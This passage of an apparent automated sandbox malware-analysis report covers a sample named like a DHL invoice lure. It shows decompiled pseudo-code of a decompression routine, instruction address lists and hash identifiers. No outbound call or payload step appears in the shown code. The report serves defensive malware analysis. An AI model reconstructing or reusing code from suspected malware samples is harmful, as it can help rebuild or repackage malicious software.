                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        													__eflags =  *(__ebp - 0x30);
                                        													 *( *(__ebp - 0x68)) = __cl;
                                        													 *(__ebp - 0x14) = _t414;
                                        													if( *(__ebp - 0x30) > 0) {
                                        														continue;
                                        													} else {
                                        														L80:
                                        														 *(__ebp - 0x88) = 2;
                                        														goto L1;
                                        													}
                                        												}
                                        												 *(__ebp - 0x88) = 0x1c;
                                        												goto L170;
                                        										}
                                        									}
                                        									L171:
                                        									_t544 = _t543 | 0xffffffff;
                                        									goto L172;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					goto L1;
                                        				}
                                        			}














                                        0x00000000
                                        0x00406905
                                        0x00406905
                                        0x00406909
                                        0x0040692a
                                        0x00406931
                                        0x00406937
                                        0x0040693d
                                        0x0040694f
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040690b
                                        0x00406911
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00406eec
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00406f04
                                        0x00406f08
                                        0x00406f08
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00406d4e
                                        0x00406d4e
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00000000
                                        0x00406d90
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00406d4e
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d54
                                        0x00406d4e
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df2
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e24
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000
                                        0x00406f01
                                        0x00406d4e
                                        0x00406cd5
                                        0x00406cd2
                                        0x00000000
                                        0x00406909

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                        • Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
                                        • Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                        • Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00406A23() {
                                        				unsigned short _t531;
                                        				signed int _t532;
                                        				void _t533;
                                        				signed int _t534;
                                        				signed int _t535;
                                        				signed int _t565;
                                        				signed int _t568;
                                        				signed int _t589;
                                        				signed int* _t606;
                                        				void* _t613;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t613 - 0x40) != 0) {
                                        						 *(_t613 - 0x84) = 0xb;
                                        						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                        						goto L132;
                                        					} else {
                                        						__eax =  *(__ebp - 0x28);
                                        						L88:
                                        						 *(__ebp - 0x2c) = __eax;
                                        						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        						L89:
                                        						__eax =  *(__ebp - 4);
                                        						 *(__ebp - 0x80) = 0x15;
                                        						__eax =  *(__ebp - 4) + 0xa68;
                                        						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                        						L69:
                                        						 *(__ebp - 0x84) = 0x12;
                                        						while(1) {
                                        							L132:
                                        							 *(_t613 - 0x54) = _t606;
                                        							while(1) {
                                        								L133:
                                        								_t531 =  *_t606;
                                        								_t589 = _t531 & 0x0000ffff;
                                        								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                        								if( *(_t613 - 0xc) >= _t565) {
                                        									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                        									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                        									 *(_t613 - 0x40) = 1;
                                        									_t532 = _t531 - (_t531 >> 5);
                                        									 *_t606 = _t532;
                                        								} else {
                                        									 *(_t613 - 0x10) = _t565;
                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                        								}
                                        								if( *(_t613 - 0x10) >= 0x1000000) {
                                        									goto L139;
                                        								}
                                        								L137:
                                        								if( *(_t613 - 0x6c) == 0) {
                                        									 *(_t613 - 0x88) = 5;
                                        									L170:
                                        									_t568 = 0x22;
                                        									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                        									_t535 = 0;
                                        									L172:
                                        									return _t535;
                                        								}
                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                        								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        								L139:
                                        								_t533 =  *(_t613 - 0x84);
                                        								while(1) {
                                        									 *(_t613 - 0x88) = _t533;
                                        									while(1) {
                                        										L1:
                                        										_t534 =  *(_t613 - 0x88);
                                        										if(_t534 > 0x1c) {
                                        											break;
                                        										}
                                        										switch( *((intOrPtr*)(_t534 * 4 +  &M00406F09))) {
                                        											case 0:
                                        												if( *(_t613 - 0x6c) == 0) {
                                        													goto L170;
                                        												}
                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        												_t534 =  *( *(_t613 - 0x70));
                                        												if(_t534 > 0xe1) {
                                        													goto L171;
                                        												}
                                        												_t538 = _t534 & 0x000000ff;
                                        												_push(0x2d);
                                        												asm("cdq");
                                        												_pop(_t570);
                                        												_push(9);
                                        												_pop(_t571);
                                        												_t609 = _t538 / _t570;
                                        												_t540 = _t538 % _t570 & 0x000000ff;
                                        												asm("cdq");
                                        												_t604 = _t540 % _t571 & 0x000000ff;
                                        												 *(_t613 - 0x3c) = _t604;
                                        												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                        												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                        												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                        												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                        													L10:
                                        													if(_t612 == 0) {
                                        														L12:
                                        														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                        														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        														goto L15;
                                        													} else {
                                        														goto L11;
                                        													}
                                        													do {
                                        														L11:
                                        														_t612 = _t612 - 1;
                                        														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                        													} while (_t612 != 0);
                                        													goto L12;
                                        												}
                                        												if( *(_t613 - 4) != 0) {
                                        													GlobalFree( *(_t613 - 4)); // executed
                                        												}
                                        												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                        												 *(_t613 - 4) = _t534;
                                        												if(_t534 == 0) {
                                        													goto L171;
                                        												} else {
                                        													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                        													goto L10;
                                        												}
                                        											case 1:
                                        												L13:
                                        												__eflags =  *(_t613 - 0x6c);
                                        												if( *(_t613 - 0x6c) == 0) {
                                        													 *(_t613 - 0x88) = 1;
                                        													goto L170;
                                        												}
                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        												_t45 = _t613 - 0x48;
                                        												 *_t45 =  *(_t613 - 0x48) + 1;
                                        												__eflags =  *_t45;
                                        												L15:
                                        												if( *(_t613 - 0x48) < 4) {
                                        													goto L13;
                                        												}
                                        												_t546 =  *(_t613 - 0x40);
                                        												if(_t546 ==  *(_t613 - 0x74)) {
                                        													L20:
                                        													 *(_t613 - 0x48) = 5;
                                        													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                        													goto L23;
                                        												}
                                        												 *(_t613 - 0x74) = _t546;
                                        												if( *(_t613 - 8) != 0) {
                                        													GlobalFree( *(_t613 - 8)); // executed
                                        												}
                                        												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                        												 *(_t613 - 8) = _t534;
                                        												if(_t534 == 0) {
                                        													goto L171;
                                        												} else {
                                        													goto L20;
                                        												}
                                        											case 2:
                                        												L24:
                                        												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                        												 *(_t613 - 0x84) = 6;
                                        												 *(_t613 - 0x4c) = _t553;
                                        												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                        												L132:
                                        												 *(_t613 - 0x54) = _t606;
                                        												goto L133;
                                        											case 3:
                                        												L21:
                                        												__eflags =  *(_t613 - 0x6c);
                                        												if( *(_t613 - 0x6c) == 0) {
                                        													 *(_t613 - 0x88) = 3;
                                        													goto L170;
                                        												}
                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        												_t67 = _t613 - 0x70;
                                        												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                        												__eflags =  *_t67;
                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        												L23:
                                        												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                        												if( *(_t613 - 0x48) != 0) {
                                        													goto L21;
                                        												}
                                        												goto L24;
                                        											case 4:
                                        												L133:
                                        												_t531 =  *_t606;
                                        												_t589 = _t531 & 0x0000ffff;
                                        												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                        												if( *(_t613 - 0xc) >= _t565) {
                                        													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                        													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                        													 *(_t613 - 0x40) = 1;
                                        													_t532 = _t531 - (_t531 >> 5);
                                        													 *_t606 = _t532;
                                        												} else {
                                        													 *(_t613 - 0x10) = _t565;
                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                        												}
                                        												if( *(_t613 - 0x10) >= 0x1000000) {
                                        													goto L139;
                                        												}
                                        											case 5:
                                        												goto L137;
                                        											case 6:
                                        												__edx = 0;
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
